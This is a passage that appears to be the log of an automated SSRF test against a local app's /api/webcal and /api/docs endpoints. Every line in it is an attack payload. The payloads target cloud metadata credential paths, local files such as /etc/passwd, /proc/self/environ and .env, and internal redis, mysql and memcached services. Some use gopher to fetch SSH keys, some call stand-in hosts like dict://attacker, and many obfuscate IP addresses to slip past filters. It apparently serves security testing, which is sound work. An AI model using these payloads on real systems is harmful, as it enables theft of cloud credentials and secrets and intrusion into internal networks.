`http://localhost:4200/api/webcal?url=%E2%93%AA%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%EF%BD%A1%E2%93%AA%E2%93%AA%E2%93%AA%E2%91%A2%E2%91%A6%E2%91%A5%EF%BD%A1%E2%93%AA%E2%93%AA%E2%93%AA%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%EF%BD%A1%E2%93%AA%E2%93%AA%E2%93%AA%E2%93%AA%E2%93%AA%E2%91%A2%E2%91%A6%E2%91%A5%3A80` +- Testing: `http://localhost:4200/api/webcal?url=%5B%3A%3A%E2%91%A0%E2%91%A5%E2%91%A8%EF%BD%A1%E2%91%A1%E2%91%A4%E2%91%A3%EF%BD%A1%E2%91%AF%E2%91%A8%EF%BD%A1%E2%91%A1%E2%91%A4%E2%91%A3%5D%3A80` +- Testing: `http://localhost:4200/api/webcal?url=%5B%3A%3A%E2%93%95%E2%93%95%E2%93%95%E2%93%95%3A%E2%91%A0%E2%91%A5%E2%91%A8%E3%80%82%E2%91%A1%E2%91%A4%E2%91%A3%E3%80%82%E2%91%AF%E2%91%A8%E3%80%82%E2%91%A1%E2%91%A4%E2%91%A3%5D%3A80` +- Testing: `http://localhost:4200/api/webcal?url=%E2%93%AA%E2%93%A7%E2%93%90%E2%91%A8%E3%80%82%E2%93%AA%E2%91%A2%E2%91%A6%E2%91%A5%E3%80%82%E2%91%A3%E2%91%A2%E2%91%A4%E2%91%A0%E2%91%A7%3A80` +- Testing: `http://localhost:4200/api/webcal?url=%E2%93%AA%E2%93%A7%E2%93%90%E2%91%A8%EF%BD%A1%E2%91%AF%E2%91%A5%E2%91%A7%E2%91%A8%E2%91%A5%E2%91%A5%E2%91%A1%3A80` +- Testing: `http://localhost:4200/api/webcal?url=%E2%93%AA%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%E3%80%82%E2%91%AF%E2%91%A5%E2%91%A7%E2%91%A8%E2%91%A5%E2%91%A5%E2%91%A1%3A80` +- Testing: `http://localhost:4200/api/webcal?url=%E2%93%AA%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%EF%BD%A1%E2%93%AA%E2%93%A7%E2%93%95%E2%93%94%EF%BD%A1%E2%91%A3%E2%91%A2%E2%91%A4%E2%91%A0%E2%91%A7%3A80` +- Testing: `http://localhost:4200/api/webcal?url=dict%3A%2F%2Fattacker%3A11111` +- Testing: `http://localhost:4200/api/webcal?url=file%3A%2F%2F%2Fetc%2Fpasswd` +- Testing: `http://localhost:4200/api/webcal?url=file%3A%2F%2F%5C%2F%5C%2Fetc%2Fpasswd` +- Testing: `http://localhost:4200/api/webcal?url=file%3A%2F%2Fpath%2Fto%2Ffile` +- Testing: `http://localhost:4200/api/webcal?url=gopher%3A%2F%2Fmetadata.google.internal%3A80%2FxGET%2520%2FcomputeMetadata%2Fv1%2Finstance%2Fattributes%2Fssh-keys%2520HTTP%252f%2531%252e%2531%250AHost%3A%2520metadata.google.internal%250AAccept%3A%2520%252a%252f%252a%250aMetadata-Flavor%3A%2520Google%250d%250a` +- Testing: `http://localhost:4200/api/webcal?url=gopher%3A%2F%2Fnozaki.io%2F_SSRF%250ATest!` +- Testing: `http://localhost:4200/api/webcal?url=0.0.0.0%3A22` +- Testing: `http://localhost:4200/api/webcal?url=0.0.0.0%3A443` +- Testing: `http://localhost:4200/api/webcal?url=0.0.0.0%3A80` +- Testing: `http://localhost:4200/api/webcal?url=0.0.0.0%3A3389` +- Testing: `http://localhost:4200/api/webcal?url=0000%3A%3A1%3A22` +- Testing: `http://localhost:4200/api/webcal?url=0000%3A%3A1%3A25` +- Testing: `http://localhost:4200/api/webcal?url=0000%3A%3A1%3A3128` +- Testing: `http://localhost:4200/api/webcal?url=0000%3A%3A1%3A3389` +- Testing: `http://localhost:4200/api/webcal?url=0251.00376.000251.0000376` +- Testing: `http://localhost:4200/api/webcal?url=0x41414141A9FEA9FE` +- Testing: `http://localhost:4200/api/webcal?url=0xA9.0xFE.0xA9.0xFE` +- Testing: `http://localhost:4200/api/webcal?url=0xA9FEA9FE` +- Testing: `http://localhost:4200/api/webcal?url=0xa9fea9fe` +- Testing: `http://localhost:4200/api/webcal?url=100.100.100.200%2Flatest%2Fmeta-data%2F` +- Testing: `http://localhost:4200/api/webcal?url=100.100.100.200%2Flatest%2Fmeta-data%2Fimage-id` +- Testing: `http://localhost:4200/api/webcal?url=100.100.100.200%2Flatest%2Fmeta-data%2Finstance-id` +- Testing: `http://localhost:4200/api/webcal?url=127.0.0.0` +- Testing: `http://localhost:4200/api/webcal?url=127.0.0.1%3A22` +- Testing: `http://localhost:4200/api/webcal?url=127.0.0.1%3A2379%2Fversion` +- Testing: `http://localhost:4200/api/webcal?url=127.0.0.1%3A443` +- Testing: `http://localhost:4200/api/webcal?url=127.0.0.1%3A80` +- Testing: `http://localhost:4200/api/webcal?url=127.0.0.1%3A3389` +- Testing: `http://localhost:4200/api/webcal?url=127.0.0.1%3A8000` +- Testing: `http://localhost:4200/api/webcal?url=127.0.0.1%3A9901` +- Testing: `http://localhost:4200/api/webcal?url=127.0.0.1%3A8001` +- Testing: `http://localhost:4200/api/webcal?url=127.0.0.1%3A8444` +- Testing: `http://localhost:4200/api/webcal?url=127.1.1.1` +- Testing: `http://localhost:4200/api/webcal?url=127.1.1.1%3A80%23%5C%40127.2.2.2%3A80` +- Testing: `http://localhost:4200/api/webcal?url=127.1.1.1%3A80%3A%5C%40%40127.2.2.2%3A80` +- Testing: `http://localhost:4200/api/webcal?url=127.1.1.1%3A80%5C%40127.2.2.2%3A80` +- Testing: `http://localhost:4200/api/webcal?url=127.1.1.1%3A80%5C%40%40127.2.2.2%3A80` +- Testing: `http://localhost:4200/api/webcal?url=127.127.127.127.nip.io` +- Testing: `http://localhost:4200/api/webcal?url=169.254.169.254.xip.io` +- Testing: `http://localhost:4200/api/webcal?url=169.254.169.254%2FcomputeMetadata%2Fv1%2F` +- Testing: `http://localhost:4200/api/webcal?url=169.254.169.254%2Flatest%2Fdynamic%2Finstance-identity%2Fdocument` +- Testing: `http://localhost:4200/api/webcal?url=169.254.169.254%2Flatest%2Fmeta-data%2F` +- Testing: `http://localhost:4200/api/webcal?url=169.254.169.254%2Flatest%2Fmeta-data%2Fami-id` +- Testing: `http://localhost:4200/api/webcal?url=169.254.169.254%2Flatest%2Fmeta-data%2Fhostname` +- Testing: `http://localhost:4200/api/webcal?url=169.254.169.254%2Flatest%2Fmeta-data%2Fiam%2Fsecurity-credentials%2F` +- Testing: `http://localhost:4200/api/webcal?url=169.254.169.254%2Flatest%2Fmeta-data%2Fiam%2Fsecurity-credentials%2FPhotonInstance` +- Testing: `http://localhost:4200/api/webcal?url=169.254.169.254%2Flatest%2Fmeta-data%2Fiam%2Fsecurity-credentials%2Fdummy` +- Testing: `http://localhost:4200/api/webcal?url=169.254.169.254%2Flatest%2Fmeta-data%2Fiam%2Fsecurity-credentials%2Fs3access` +- Testing: `http://localhost:4200/api/webcal?url=169.254.169.254%2Flatest%2Fmeta-data%2Fpublic-keys%2F` +- Testing: `http://localhost:4200/api/webcal?url=169.254.169.254%2Flatest%2Fmeta-data%2Fpublic-keys%2F0%2Fopenssh-key` +- Testing: `http://localhost:4200/api/webcal?url=169.254.169.254%2Flatest%2Fmeta-data%2Fpublic-keys%2F%5BID%5D%2Fopenssh-key` +- Testing: `http://localhost:4200/api/webcal?url=169.254.169.254%2Flatest%2Fmeta-data%2Freservation-id` +- Testing: `http://localhost:4200/api/webcal?url=169.254.169.254%2Flatest%2Fuser-data` +- Testing: `http://localhost:4200/api/webcal?url=169.254.169.254%2Flatest%2Fuser-data%2Fiam%2Fsecurity-credentials%2F` +- Testing: `http://localhost:4200/api/webcal?url=192.0.0.192%2Flatest%2F` +- Testing: `http://localhost:4200/api/webcal?url=192.0.0.192%2Flatest%2Fattributes%2F` +- Testing: `http://localhost:4200/api/webcal?url=192.0.0.192%2Flatest%2Fmeta-data%2F` +- Testing: `http://localhost:4200/api/webcal?url=192.0.0.192%2Flatest%2Fuser-data%2F` +- Testing: `http://localhost:4200/api/webcal?url=3232235521` +- Testing: `http://localhost:4200/api/webcal?url=3232235777` +- Testing: `http://localhost:4200/api/webcal?url=425.510.425.510` +- Testing: `http://localhost:4200/api/webcal?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D` +- Testing: `http://localhost:4200/api/webcal?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%3A8000` +- Testing: `http://localhost:4200/api/webcal?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%3A8001` +- Testing: `http://localhost:4200/api/webcal?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%3A8444` +- Testing: `http://localhost:4200/api/webcal?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%3A9901` +- Testing: `http://localhost:4200/api/webcal?url=%5B%3A%3A%5D` +- Testing: `http://localhost:4200/api/webcal?url=%5B%3A%3A%5D%3A22` +- Testing: `http://localhost:4200/api/webcal?url=%5B%3A%3A%5D%3A25` +- Testing: `http://localhost:4200/api/webcal?url=%5B%3A%3A%5D%3A3128` +- Testing: `http://localhost:4200/api/webcal?url=%5B%3A%3A%5D%3A80` +- Testing: `http://localhost:4200/api/webcal?url=%5B%3A%3A%5D%3A3389` +- Testing: `http://localhost:4200/api/webcal?url=%5B%3A%3A%5D%3A8000` +- Testing: `http://localhost:4200/api/webcal?url=%5B%3A%3A%5D%3A8001` +- Testing: `http://localhost:4200/api/webcal?url=%5B%3A%3A%5D%3A8444` +- Testing: `http://localhost:4200/api/webcal?url=%5B%3A%3A%5D%3A9901` +- Testing: `http://localhost:4200/api/webcal?url=app-169-254-169-254.nip.io` +- Testing: `http://localhost:4200/api/webcal?url=customer2-app-169-254-169-254.nip.io` +- Testing: `http://localhost:4200/api/webcal?url=instance-data` +- Testing: `http://localhost:4200/api/webcal?url=localhost%3A22` +- Testing: `http://localhost:4200/api/webcal?url=localhost%3A443` +- Testing: `http://localhost:4200/api/webcal?url=localhost%3A80` +- Testing: `http://localhost:4200/api/webcal?url=localhost%3A3389` +- Testing: `http://localhost:4200/api/webcal?url=localhost%3A8000` +- Testing: `http://localhost:4200/api/webcal?url=localhost%3A8001` +- Testing: `http://localhost:4200/api/webcal?url=localhost%3A8444` +- Testing: `http://localhost:4200/api/webcal?url=localhost%3A9901` +- Testing: `http://localhost:4200/api/webcal?url=localhost.localdomain` +- Testing: `http://localhost:4200/api/webcal?url=loopback` +- Testing: `http://localhost:4200/api/webcal?url=loopback%3A22` +- Testing: `http://localhost:4200/api/webcal?url=loopback%3A80` +- Testing: `http://localhost:4200/api/webcal?url=loopback%3A443` +- Testing: `http://localhost:4200/api/webcal?url=loopback%3A3389` +- Testing: `http://localhost:4200/api/webcal?url=loopback%3A8000` +- Testing: `http://localhost:4200/api/webcal?url=loopback%3A9901` +- Testing: `http://localhost:4200/api/webcal?url=loopback%3A8001` +- Testing: `http://localhost:4200/api/webcal?url=loopback%3A8444` +- Testing: `http://localhost:4200/api/webcal?url=ipcop.localdomain%3A8443` +- Testing: `http://localhost:4200/api/webcal?url=metadata.google.internal%2FcomputeMetadata%2Fv1%2F` +- Testing: `http://localhost:4200/api/webcal?url=metadata.google.internal%2FcomputeMetadata%2Fv1%2Finstance%2Fhostname` +- Testing: `http://localhost:4200/api/webcal?url=metadata.google.internal%2FcomputeMetadata%2Fv1%2Finstance%2Fid` +- Testing: `http://localhost:4200/api/webcal?url=metadata.google.internal%2FcomputeMetadata%2Fv1%2Fproject%2Fproject-id` +- Testing: `http://localhost:4200/api/webcal?url=metadata.nicob.net` +- Testing: `http://localhost:4200/api/webcal?url=owasp.org.169.254.169.254.nip.io` +- Testing: `http://localhost:4200/api/webcal?url=ssrf-169.254.169.254.localdomain.pw` +- Testing: `http://localhost:4200/api/webcal?url=ssrf-cloud.localdomain.pw` +- Testing: `http://localhost:4200/api/webcal?url=www.owasp.org.1ynrnhl.xip.io` +- Testing: `http://localhost:4200/api/webcal?url=127.1%3A80` +- Testing: `http://localhost:4200/api/webcal?url=%5B%3A%3A%5D%3A80%2F` +- Testing: `http://localhost:4200/api/webcal?url=%5B%3A%3A%5D%3A25%2F%20SMTP` +- Testing: `http://localhost:4200/api/webcal?url=%5B%3A%3A%5D%3A3128%2F%20Squid` +- Testing: `http://localhost:4200/api/webcal?url=%5B0000%3A%3A1%5D%3A80%2F` +- Testing: `http://localhost:4200/api/webcal?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%2Fthefile` +- Testing: `http://localhost:4200/api/webcal?url=%E2%91%A0%E2%91%A1%E2%91%A6.%E2%93%AA.%E2%93%AA.%E2%93%AA` +- Testing: `http://localhost:4200/api/webcal?url=2130706433%2F` +- Testing: `http://localhost:4200/api/webcal?url=3232235521%2F` +- Testing: `http://localhost:4200/api/webcal?url=3232235777%2F` +- Testing: `http://localhost:4200/api/webcal?url=0x7f000001%2F` +- Testing: `http://localhost:4200/api/webcal?url=0xc0a80014%2F` +- Testing: `http://localhost:4200/api/webcal?url=%7Bdomain%7D%40127.0.0.1` +- Testing: `http://localhost:4200/api/webcal?url=127.0.0.1%23%7Bdomain%7D` +- Testing: `http://localhost:4200/api/webcal?url=%7Bdomain%7D.127.0.0.1` +- Testing: `http://localhost:4200/api/webcal?url=127.0.0.1%2F%7Bdomain%7D` +- Testing: `http://localhost:4200/api/webcal?url=127.0.0.1%2F%3Fd%3D%7Bdomain%7D` +- Testing: `http://localhost:4200/api/webcal?url=%7Bdomain%7D%40localhost` +- Testing: `http://localhost:4200/api/webcal?url=localhost%23%7Bdomain%7D` +- Testing: `http://localhost:4200/api/webcal?url=%7Bdomain%7D.localhost` +- Testing: `http://localhost:4200/api/webcal?url=localhost%2F%7Bdomain%7D` +- Testing: `http://localhost:4200/api/webcal?url=localhost%2F%3Fd%3D%7Bdomain%7D` +- Testing: `http://localhost:4200/api/webcal?url=127.0.0.1%2500%7Bdomain%7D` +- Testing: `http://localhost:4200/api/webcal?url=127.0.0.1%3F%7Bdomain%7D` +- Testing: `http://localhost:4200/api/webcal?url=127.0.0.1%2F%2F%2F%7Bdomain%7D` +- Testing: `http://localhost:4200/api/webcal?url=127.0.0.1%2F%2F%2F%7Bdomain%7Dst%3A%2B11211aaa` +- Testing: `http://localhost:4200/api/webcal?url=st%3A00011211aaaa` +- Testing: `http://localhost:4200/api/webcal?url=0%2F` +- Testing: `http://localhost:4200/api/webcal?url=1.1.1.1%20%26%402.2.2.2%23%20%403.3.3.3%2F` +- Testing: `http://localhost:4200/api/webcal?url=127.1.1.1%3A80%5C%5C%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/webcal?url=127.1.1.1%3A80%5C%5C%40%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/webcal?url=127.1.1.1%3A80%3A%5C%5C%40%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/webcal?url=127.1.1.1%3A80%23%5C%5C%40127.2.2.2%3A80%2F` +## Testing endpoint: http://localhost:4200/api/docs +- Testing: `http://localhost:4200/api/docs?url=169.254.169.254%2Flatest%2Fmeta-data%2F` +- Testing: `http://localhost:4200/api/docs?url=metadata.google.internal%2FcomputeMetadata%2Fv1%2F` +- Testing: `http://localhost:4200/api/docs?url=localhost%3A8080%2Fadmin` +- Testing: `http://localhost:4200/api/docs?url=file%3A%2F%2F%2Fetc%2Fpasswd` +- Testing: `http://localhost:4200/api/docs?url=file%3A%2F%2F%2Fproc%2Fself%2Fenviron` +- Testing: `http://localhost:4200/api/docs?url=localhost%3A3000%2Fadmin` +- Testing: `http://localhost:4200/api/docs?url=127.0.0.1%3A3000%2Fconfig` +- Testing: `http://localhost:4200/api/docs?url=localhost%3A3000%2Fapi%2Finternal` +- Testing: `http://localhost:4200/api/docs?url=localhost%3A3000%2Frails%2Finfo` +- Testing: `http://localhost:4200/api/docs?url=localhost%3A3000%2Flogs` +- Testing: `http://localhost:4200/api/docs?url=mysql%3A%2F%2F127.0.0.1%3A3306%2F` +- Testing: `http://localhost:4200/api/docs?url=mysql%3A%2F%2Flocalhost%3A3306%2F` +- Testing: `http://localhost:4200/api/docs?url=redis%3A%2F%2F127.0.0.1%3A6379%2F` +- Testing: `http://localhost:4200/api/docs?url=redis%3A%2F%2Flocalhost%3A6379%2F` +- Testing: `http://localhost:4200/api/docs?url=127.0.0.1%3A9876%2F` +- Testing: `http://localhost:4200/api/docs?url=127.0.0.1%3A54247%2F` +- Testing: `http://localhost:4200/api/docs?url=127.0.0.1%3A59465%2F` +- Testing: `http://localhost:4200/api/docs?url=file%3A%2F%2F%2Fvar%2Flog%2Fnginx%2Faccess.log` +- Testing: `http://localhost:4200/api/docs?url=localhost%3A4200%2F.git%2Fconfig` +- Testing: `http://localhost:4200/api/docs?url=169.254.169.254%2Fmetadata%2Finstance` +- Testing: `http://localhost:4200/api/docs?url=localhost%3A4200%2Fapi%2Fdocs%2F` +- Testing: `http://localhost:4200/api/docs?url=localhost%3A4200%2Fapi%2Finternal` +- Testing: `http://localhost:4200/api/docs?url=localhost%3A4200%2Fapi%2Flogs` +- Testing: `http://localhost:4200/api/docs?url=localhost%3A4200%2Fapi%2Fconfig` +- Testing: `http://localhost:4200/api/docs?url=localhost%3A4200%2Fapi%2Fauth_test` +- Testing: `http://localhost:4200/api/docs?url=localhost%3A4200%2Fapi%2Foverseer_images` +- Testing: `http://localhost:4200/api/docs?url=localhost%3A4200%2Fapi%2Fcampuses` +- Testing: `http://localhost:4200/api/docs?url=localhost%3A4200%2Fapi%2Fcsv` +- Testing: `http://localhost:4200/api/docs?url=localhost%3A4200%2Fapi%2Fprojects` +- Testing: `http://localhost:4200/api/docs?url=localhost%3A4200%2Fapi%2Fsettings` +- Testing: `http://localhost:4200/api/docs?url=localhost%3A4200%2Fapi%2Fstudents` +- Testing: `http://localhost:4200/api/docs?url=localhost%3A4200%2Fapi%2Fsubmission` +- Testing: `http://localhost:4200/api/docs?url=localhost%3A4200%2Fapi%2Ftasks` +- Testing: `http://localhost:4200/api/docs?url=localhost%3A4200%2Fapi%2Fteaching_periods` +- Testing: `http://localhost:4200/api/docs?url=localhost%3A4200%2Fapi%2Ftii_actions` +- Testing: `http://localhost:4200/api/docs?url=localhost%3A4200%2Fapi%2Ftii_eula` +- Testing: `http://localhost:4200/api/docs?url=localhost%3A4200%2Fapi%2Ftii_hook` +- Testing: `http://localhost:4200/api/docs?url=localhost%3A4200%2Fapi%2Ftutorials` +- Testing: `http://localhost:4200/api/docs?url=localhost%3A4200%2Fapi%2Funit_roles` +- Testing: `http://localhost:4200/api/docs?url=localhost%3A4200%2Fapi%2Funits` +- Testing: `http://localhost:4200/api/docs?url=localhost%3A4200%2Fapi%2Fusers` +- Testing: `http://localhost:4200/api/docs?url=localhost%3A4200%2F.env` +- Testing: `http://localhost:4200/api/docs?url=localhost%3A4200%2F.git` +- Testing: `http://localhost:4200/api/docs?url=127.0.0.1%3A80` +- Testing: `http://localhost:4200/api/docs?url=127.0.0.1%3A443` +- Testing: `http://localhost:4200/api/docs?url=127.0.0.1%3A22` +- Testing: `http://localhost:4200/api/docs?url=127.1%3A80` +- Testing: `http://localhost:4200/api/docs?url=0` +- Testing: `http://localhost:4200/api/docs?url=0.0.0.0%3A80` +- Testing: `http://localhost:4200/api/docs?url=localhost%3A80` +- Testing: `http://localhost:4200/api/docs?url=%5B%3A%3A%5D%3A80%2F` +- Testing: `http://localhost:4200/api/docs?url=%5B%3A%3A%5D%3A25%2F%20SMTP` +- Testing: `http://localhost:4200/api/docs?url=%5B%3A%3A%5D%3A3128%2F%20Squid` +- Testing: `http://localhost:4200/api/docs?url=%5B0000%3A%3A1%5D%3A80%2F` +- Testing: `http://localhost:4200/api/docs?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%2Fthefile` +- Testing: `http://localhost:4200/api/docs?url=%E2%91%A0%E2%91%A1%E2%91%A6.%E2%93%AA.%E2%93%AA.%E2%93%AA` +- Testing: `http://localhost:4200/api/docs?url=127.127.127.127` +- Testing: `http://localhost:4200/api/docs?url=127.0.1.3` +- Testing: `http://localhost:4200/api/docs?url=127.0.0.0` +- Testing: `http://localhost:4200/api/docs?url=2130706433` +- Testing: `http://localhost:4200/api/docs?url=017700000001` +- Testing: `http://localhost:4200/api/docs?url=0x7f000001` +- Testing: `http://localhost:4200/api/docs?url=google.com%40127.0.0.1` +- Testing: `http://localhost:4200/api/docs?url=127.0.0.1%23google.com` +- Testing: `http://localhost:4200/api/docs?url=google.com.127.0.0.1` +- Testing: `http://localhost:4200/api/docs?url=127.0.0.1%2Fgoogle.com` +- Testing: `http://localhost:4200/api/docs?url=127.0.0.1%2F%3Fd%3Dgoogle.com` +- Testing: `http://localhost:4200/api/docs?url=` +- Testing: `http://localhost:4200/api/docs?url=google.com%40127.0.0.1` +- Testing: `http://localhost:4200/api/docs?url=` +- Testing: `http://localhost:4200/api/docs?url=127.0.0.1%23google.com` +- Testing: `http://localhost:4200/api/docs?url=` +- Testing: `http://localhost:4200/api/docs?url=google.com.127.0.0.1` +- Testing: `http://localhost:4200/api/docs?url=` +- Testing: `http://localhost:4200/api/docs?url=127.0.0.1%2Fgoogle.com` +- Testing: `http://localhost:4200/api/docs?url=` +- Testing: `http://localhost:4200/api/docs?url=127.0.0.1%2F%3Fd%3Dgoogle.com` +- Testing: `http://localhost:4200/api/docs?url=google.com%40localhost` +- Testing: `http://localhost:4200/api/docs?url=localhost%23google.com` +- Testing: `http://localhost:4200/api/docs?url=google.com.localhost` +- Testing: `http://localhost:4200/api/docs?url=localhost%2Fgoogle.com` +- Testing: `http://localhost:4200/api/docs?url=localhost%2F%3Fd%3Dgoogle.com` +- Testing: `http://localhost:4200/api/docs?url=127.0.0.1%2500google.com` +- Testing: `http://localhost:4200/api/docs?url=127.0.0.1%3Fgoogle.com` +- Testing: `http://localhost:4200/api/docs?url=127.0.0.1%2F%2F%2Fgoogle.com` +- Testing: `http://localhost:4200/api/docs?url=` +- Testing: `http://localhost:4200/api/docs?url=127.0.0.1%2500google.com` +- Testing: `http://localhost:4200/api/docs?url=` +- Testing: `http://localhost:4200/api/docs?url=127.0.0.1%3Fgoogle.com` +- Testing: `http://localhost:4200/api/docs?url=` +- Testing: `http://localhost:4200/api/docs?url=127.0.0.1%2F%2F%2Fgoogle.com` +- Testing: `http://localhost:4200/api/docs?url=localtest.me` +- Testing: `http://localhost:4200/api/docs?url=http%3A%400%2F` +- Testing: `http://localhost:4200/api/docs?url=%5B%3A%3A%5D%3A80` +- Testing: `http://localhost:4200/api/docs?url=127%E3%80%820%E3%80%820%E3%80%821` +- Testing: `http://localhost:4200/api/docs?url=127%25E3%2580%25820%25E3%2580%25820%25E3%2580%25821` +- Testing: `http://localhost:4200/api/docs?url=2130706433%2F` +- Testing: `http://localhost:4200/api/docs?url=3232235521%2F` +- Testing: `http://localhost:4200/api/docs?url=3232235777%2F` +- Testing: `http://localhost:4200/api/docs?url=0177.0000.0000.0001` +- Testing: `http://localhost:4200/api/docs?url=00000177.00000000.00000000.00000001` +- Testing: `http://localhost:4200/api/docs?url=127.0.0.1` +- Testing: `http://localhost:4200/api/docs?url=0x7f000001%2F` +- Testing: `http://localhost:4200/api/docs?url=0xc0a80014%2F` +- Testing: `http://localhost:4200/api/docs?url=0x7f.0x00.0x00.0x01` +- Testing: `http://localhost:4200/api/docs?url=0x0000007f.0x00000000.0x00000000.0x00000001` +- Testing: `http://localhost:4200/api/docs?url=127.000000000000.1` +- Testing: `http://localhost:4200/api/docs?url=localhost%3A%2B11211aaa` +- Testing: `http://localhost:4200/api/docs?url=localhost%3A00011211aaaa` +- Testing: `http://localhost:4200/api/docs?url=0%2F` +- Testing: `http://localhost:4200/api/docs?url=127.1` +- Testing: `http://localhost:4200/api/docs?url=127.0.1` +- Testing: `http://localhost:4200/api/docs?url=localtest.me` +- Testing: `http://localhost:4200/api/docs?url=customer1.app.localhost.my.company.127.0.0.1.nip.io` +- Testing: `http://localhost:4200/api/docs?url=mail.ebc.apple.com` +- Testing: `http://localhost:4200/api/docs?url=127.0.0.1.nip.io` +- Testing: `http://localhost:4200/api/docs?url=www.example.com.customlookup.www.google.com.endcustom.sentinel.pentesting.us` +- Testing: `http://localhost:4200/api/docs?url=customer1.app.localhost.my.company.127.0.0.1.nip.io` +- Testing: `http://localhost:4200/api/docs?url=bugbounty.dod.network` +- Testing: `http://localhost:4200/api/docs?url=1ynrnhl.xip.io` +- Testing: `http://localhost:4200/api/docs?url=spoofed.burpcollaborator.net` +- Testing: `http://localhost:4200/api/docs?url=customer1.app.localhost.my.company.127.0.0.1.nip.io` +- Testing: `http://localhost:4200/api/docs?url=spoofed.burpcollaborator.net` +- Testing: `http://localhost:4200/api/docs?url=127.1.1.1%3A80%5C%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/docs?url=127.1.1.1%3A80%5C%40%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/docs?url=127.1.1.1%3A80%3A%5C%40%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/docs?url=127.1.1.1%3A80%23%5C%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/docs?url=127.0.1.3` +- Testing: `http://localhost:4200/api/docs?url=0` +- Testing: `http://localhost:4200/api/docs?url=127.1` +- Testing: `http://localhost:4200/api/docs?url=127.0.1` +- Testing: `http://localhost:4200/api/docs?url=localhost` +- Testing: `http://localhost:4200/api/docs?url=1.0.0.127.in-addr.arpa` +- Testing: `http://localhost:4200/api/docs?url=01111111000000000000000000000001` +- Testing: `http://localhost:4200/api/docs?url=0x7f.0x0.0x0.0x1` +- Testing: `http://localhost:4200/api/docs?url=0177.0.0.01` +- Testing: `http://localhost:4200/api/docs?url=7F000001` +- Testing: `http://localhost:4200/api/docs?url=2130706433` +- Testing: `http://localhost:4200/api/docs?url=6425673729` +- Testing: `http://localhost:4200/api/docs?url=127001` +- Testing: `http://localhost:4200/api/docs?url=127_0._0_1` +- Testing: `http://localhost:4200/api/docs?url=0000%3A%3A1` +- Testing: `http://localhost:4200/api/docs?url=0000%3A%3A1%3A80` +- Testing: `http://localhost:4200/api/docs?url=%3A%3Affff%3A7f00%3A0001` +- Testing: `http://localhost:4200/api/docs?url=0000%3A0000%3A0000%3A0000%3A0000%3Affff%3A7f00%3A0001` +- Testing: `http://localhost:4200/api/docs?url=localtest.me` +- Testing: `http://localhost:4200/api/docs?url=bugbounty.dod.network` +- Testing: `http://localhost:4200/api/docs?url=127.127.127.127` +- Testing: `http://localhost:4200/api/docs?url=0177.0.0.1` +- Testing: `http://localhost:4200/api/docs?url=%E2%93%AA%E2%93%A7%E2%93%90%E2%91%A8%EF%BD%A1%E2%93%AA%E2%93%A7%E2%93%95%E2%93%94%EF%BD%A1%E2%93%AA%E2%93%A7%E2%93%90%E2%91%A8%EF%BD%A1%E2%93%AA%E2%93%A7%E2%93%95%E2%93%94%3A80` +- Testing: `http://localhost:4200/api/docs?url=%E2%93%AA%E2%93%A7%E2%93%90%E2%91%A8%E2%93%95%E2%93%94%E2%93%90%E2%91%A8%E2%93%95%E2%93%94%3A80` +- Testing: `http://localhost:4200/api/docs?url=%E2%91%A1%E2%91%A7%E2%91%A4%E2%91%A1%E2%93%AA%E2%91%A2%E2%91%A8%E2%91%A0%E2%91%A5%E2%91%A5%3A80` +- Testing: `http://localhost:4200/api/docs?url=%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%E3%80%82%E2%93%AA%E2%91%A2%E2%91%A6%E2%91%A5%E3%80%82%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%E3%80%82%E2%93%AA%E2%91%A2%E2%91%A6%E2%91%A5%3A80` +- Testing: `http://localhost:4200/api/docs?url=whitelisted%40127.0.0.1` +- Testing: `http://localhost:4200/api/docs?url=0x7f000001` +- Testing: `http://localhost:4200/api/docs?url=017700000001` +- Testing: `http://localhost:4200/api/docs?url=0177.00.00.01` +- Testing: `http://localhost:4200/api/docs?url=0000.0000.0000.0000` +- Testing: `http://localhost:4200/api/docs?url=0177.0000.0000.0001` +- Testing: `http://localhost:4200/api/docs?url=0177.0001.0000..0001` +- Testing: `http://localhost:4200/api/docs?url=0x7f.0x1.0x0.0x1` +- Testing: `http://localhost:4200/api/docs?url=0x7f.0x1.0x1` +- Testing: `http://localhost:4200/api/docs?url=ht%EF%BF%BD%EF%B8%8Ftp%3A%2F%2F12%EF%BF%BD7.0.0.1` +- Testing: `http://localhost:4200/api/docs?url=loopback%3A%2B11211aaa` +- Testing: `http://localhost:4200/api/docs?url=loopback%3A00011211aaaa` +- Testing: `http://localhost:4200/api/docs?url=%E2%91%AF%E2%91%A8%E3%80%82%E2%91%A1%E2%91%A4%E2%91%A3%E3%80%82%E2%91%AF%E2%91%A8%EF%BD%A1%E2%91%A1%E2%91%A4%E2%91%A3` +- Testing: `http://localhost:4200/api/docs?url=169.254.169.254` +- Testing: `http://localhost:4200/api/docs?url=2852039166` +- Testing: `http://localhost:4200/api/docs?url=7147006462` +- Testing: `http://localhost:4200/api/docs?url=0xa9.0xfe.0xa9.0xfe` +- Testing: `http://localhost:4200/api/docs?url=0251.0376.0251.0376` +- Testing: `http://localhost:4200/api/docs?url=169%E3%80%82254%E3%80%82169%E3%80%82254` +- Testing: `http://localhost:4200/api/docs?url=169%EF%BD%A1254%EF%BD%A1169%EF%BD%A1254` +- Testing: 